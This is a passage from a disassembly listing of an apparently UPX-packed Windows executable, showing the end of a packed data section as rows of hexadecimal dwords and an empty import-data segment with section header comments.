dd 8FEC8923h, 9B60CF56h, 0C3E43BDEh, 39024741h, 55C95452h
dd 7F0DA37Fh, 98B44452h, 30524C71h, 7EF75B62h, 3D926175h
dd 0EA845E8Ah, 67BD6D77h, 0F2EC4232h, 0E267639h, 66D1655Ah
dd 29816321h, 0E93768E2h, 0D470619Ah, 0EFA1E37Ah, 0E8D8CDDEh
dd 90A0A437h, 322AF066h, 0B19E7270h, 1F3A6131h, 4FDF76A2h
dd 5994F7C9h, 29C479EBh, 1C466E13h, 0AE467D72h, 0AA1FAC54h
dd 0C1B4AA38h, 0C647C2EBh, 0C4FC8562h, 66D0B85Bh, 0C0D587AAh
dd 0B5EF0AD6h, 0CB58E20Dh, 66DE0CA6h, 0EB0007BCh, 567DEF5Ah
dd 5F9CB1E8h, 74707DCBh, 3E05242Ah, 0A847E03Ah, 0F9370D1Fh
dd 5B4A1A66h, 0DCD48F92h, 0A1DB4FAEh, 0C01611F7h, 45B4AC16h
dd 0FF312FDEh, 35580450h, 6C06103Dh, 0A9D403A2h, 0A076A17Ah
dd 6E62394Fh, 0E6DFE710h, 0EF980AF2h, 1185BF8Bh, 36F36316h
dd 0C653A3F6h, 0BADDB8D6h, 10149710h, 79C838F2h, 834A9487h
dd 53101276h, 0DBC1842Ah, 0F8A0119Bh, 276CB957h, 0CB4A4955h
dd 5948A93h, 3DFDB9D9h, 881CE86Bh, 8AD0E532h, 5C84A1AAh
dd 1BC71E09h, 0FCCE59Ch, 84A1DD4Dh, 133ED25Ah, 5C634FCDh
dd 135484EFh, 0BE705796h, 1A2EBD6Fh, 214DA5A9h, 9E8CFC9Bh
dd 741052A2h, 20FC8811h, 1F2561CEh, 247CC3F6h, 33EF3661h
dd 27E4CC64h, 0FD06A81Bh, 1E05FDFh, 9636C26h, 2EB4F8BBh
dd 7BC5E26Eh, 1AFCD10Eh, 0E2B01818h, 0A09BA7DCh, 0B7385CB4h
dd 46CC0F71h, 440BE889h, 16F84ED7h, 0B0587D2Eh, 2FE95030h
dd 37BC6816h, 3165FDD5h, 49B160C9h, 0AC8704E5h, 60B48CDh
dd 6318B577h, 6F7B8A8Eh, 0F4D7FBE5h, 0B0657145h, 0D0A42FE0h
dd 0F24DAEC3h, 7E781232h, 0D5B5A48Eh, 6DE1E99Ah, 5928B864h
dd 7AF0D1BFh, 0CDE49BB6h, 7E0698ADh, 0DFF89F3Eh, 0E46A20D2h
dd 0E3408E4Dh, 9B1CCD3Ah, 24955A11h, 0DDF127A6h, 0EA10859Ah
dd 8971D45Ch, 6E988C97h, 0EB43D18Ah, 0F100B09Dh, 5F64B453h
dd 0F402B3AEh, 5889CA14h, 72D096DCh, 0DD00376Ah, 0D038BA5Eh
dd 16BC6CD2h, 0FFCAEDC5h, 80543F12h, 97F797EEh, 839C6B24h
dd 0A8F3C15h, 872742CEh, 0DC5D4EFEh, 78C699Fh, 2C6D13EBh
dd 6D61C01Ah, 5EA8EEE3h, 0C15C3AD0h, 3AFA47C9h, 6C4753CAh
dd 0C4FCDA61h, 0F22C5750h, 0CD552606h, 64947A97h, 3D613AFBh
dd 6104DD22h, 220B5BD9h, 27ED618Ah, 2438CED6h, 66CFADC1h
dd 4DD1B6F7h, 1CCB395Eh, 2AC8C7DAh, 8556FE3Dh, 0EED5ED56h
dd 0B293EB25h, 0F88BF0DEh, 9E80F71Bh, 6471F466h, 0B6CB1DABh
dd 0C7D8F7A1h, 9A166FF7h, 34307E16h, 0BDA62C4Eh, 0CFDD777Eh
dd 20CA01Fh, 0FAF84A6Dh, 0C474DD85h, 872BD77Dh, 262B76F5h
dd 646C8D3Fh, 80CF8A4Ah, 5559B422h, 1C9F8DD2h, 0A197CE85h
dd 579D70CDh, 53E83F1Ah, 9ECB9B61h, 61D3EF50h, 0D7FCCB87h
dd 598C5A09h, 1D27D2A2h, 0DFD01E0Eh, 0B6C3C1E0h, 7F1CD9E0h
dd 0EF66210Bh, 0EF0F51F7h, 0A40F99E1h, 787A244Ah, 16A4ED9Fh
dd 0AA83F331h, 0C0BC2941h, 36CB2E0Eh, 0FC98EB69h, 72C8B91Fh
dd 3417B34Ah, 9E17BF3Dh, 3B313BB9h, 8540184Ah, 33C76591h
dd 0EC90762h, 89268184h, 2A301334h, 0EDB09CD6h, 5E0C6CA2h
dd 0ED59C46Eh, 876B8EE5h, 4DCC8287h, 0B7433D6Eh, 0BAE8871h
dd 72F9C9D9h, 0CEF3175h, 0DF510703h, 2E48DEB1h, 0A97FAC59h
dd 5861960Dh, 68D9D301h, 4EA1273Dh, 94626935h, 0E2FBFAAEh
dd 0CDE86021h, 0A46390C6h, 5DDF9E5Dh, 603C39C9h, 0AA779B50h
dd 0D8C3E8E6h, 40225BE9h, 2AA4E9DCh, 53A70596h, 2E0C05CDh
dd 2E9D6EE6h, 1153DE77h, 0B2319B4Eh, 0CBB8F402h, 4625FE84h
dd 5C44D747h, 389E5B97h, 34F6B7ECh, 0BD617E03h, 34A753Ah
dd 41AEA1EDh, 4D395199h, 0C43071D3h, 53A7F20Ah, 0C798A6BEh
dd 49A98D7Dh, 88F68A26h, 0C8BB0986h, 0CE688D55h, 703C71C3h
dd 0DEF0B0D6h, 5384DC2Eh, 2BF77C5Eh, 0D4E3E9EDh, 0D8A09705h
dd 0D15C5BF1h, 1D238B64h, 9D8F1891h, 17739B7Dh, 0E8346AC3h
dd 0C2F5597Bh, 9AF2CBB2h, 4FA85A99h, 0ECF4271Ah, 0C9855C53h
dd 93C12982h, 5108C1Bh, 913BD07Ch, 0F0F12B91h, 0C7A73152h
dd 0F3C09EF6h, 76A86A31h, 9375EB0h, 0F8EC7DDh, 9A94F357h
dd 0F7843B8Ah, 841BEBC0h, 7F79B3E6h, 280E0B6h, 0EB8D5220h
dd 53E8C408h, 842DE031h, 0ACA3C595h, 85561775h, 8C3558EFh
dd 8D6C4CE2h, 0A0704720h, 6F33B912h, 58038B51h, 8476506Eh
dd 3EF6949Bh, 0D02D7E89h, 391E1F2Eh, 0BB2C7A12h, 97E8906Fh
dd 1BFF4DD0h, 2008F2BAh, 0D2D42B3Bh, 2BDA6BB5h, 2654266Bh
dd 0ADF8BE7Dh, 88819B57h, 2222E886h, 9F44283Bh, 0F43883Ch
dd 0F77EE1C6h, 1CE44DD5h, 0BDE4722Ah, 0CB65313Ah, 46F98A8Dh
dd 0C700D70Bh, 999E464Fh
dd 0D7DD058Eh, 421C5C6Fh, 1EF95F63h, 1809F2AAh, 0CF382173h
dd 0E3C16387h, 2FF255C6h, 13E1797Ah, 0B6082803h, 0EA96BF77h
dd 98C5F496h, 3124AD67h, 6FF1AC6Bh, 1D391DB2h, 0AC40324Ah
dd 0F4D944AFh, 0C35743CEh, 0D87CBDACh, 77C4BCB5h, 18C49ACAh
dd 5D781C76h, 0DE46C352h, 4829CD87h, 12CCA19Ah, 2CCDE261h
dd 60FC8537h, 0AF33E516h, 286B5875h, 4B0D62BBh, 0FCF168F2h
dd 1B8007A6h, 8CB5C946h, 843D2Ah, 1BFCA1B7h, 8AAFCBB2h
dd 55ECB35Fh, 9047C823h, 5934640h, 51DF1527h, 0EFE0EA82h
dd 7F881B16h, 0A4D4A062h, 0F70FBDE9h, 20E048F3h, 4AEDC84Eh
dd 830CE71Eh, 8A640B6h, 7876CCA0h, 8D401A6Bh, 85DC3102h
dd 0C2902572h, 64D12E3Ah, 10F87334h, 2B2DDC16h, 0CB5F69DAh
dd 0DF97DB4Fh, 6787B1EAh, 6394245Dh, 0FFCFA2A9h, 1FCB67C9h
dd 0B17060BEh, 0E14CE272h, 95B86406h, 0CEB4E5DAh, 0A868678Dh
dd 0A71CCD80h, 66DC4EA2h, 2D7C6F84h, 47587722h, 30ECF012h
dd 8284254Dh, 0B54E7827h, 9621F9C3h, 0D85F1EE2h, 7B118769h
dd 0FA4Eh, 1197h dup(0)
UPX2 ends
; Section 4. (virtual address 0001E000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 0001E000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 3151E000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start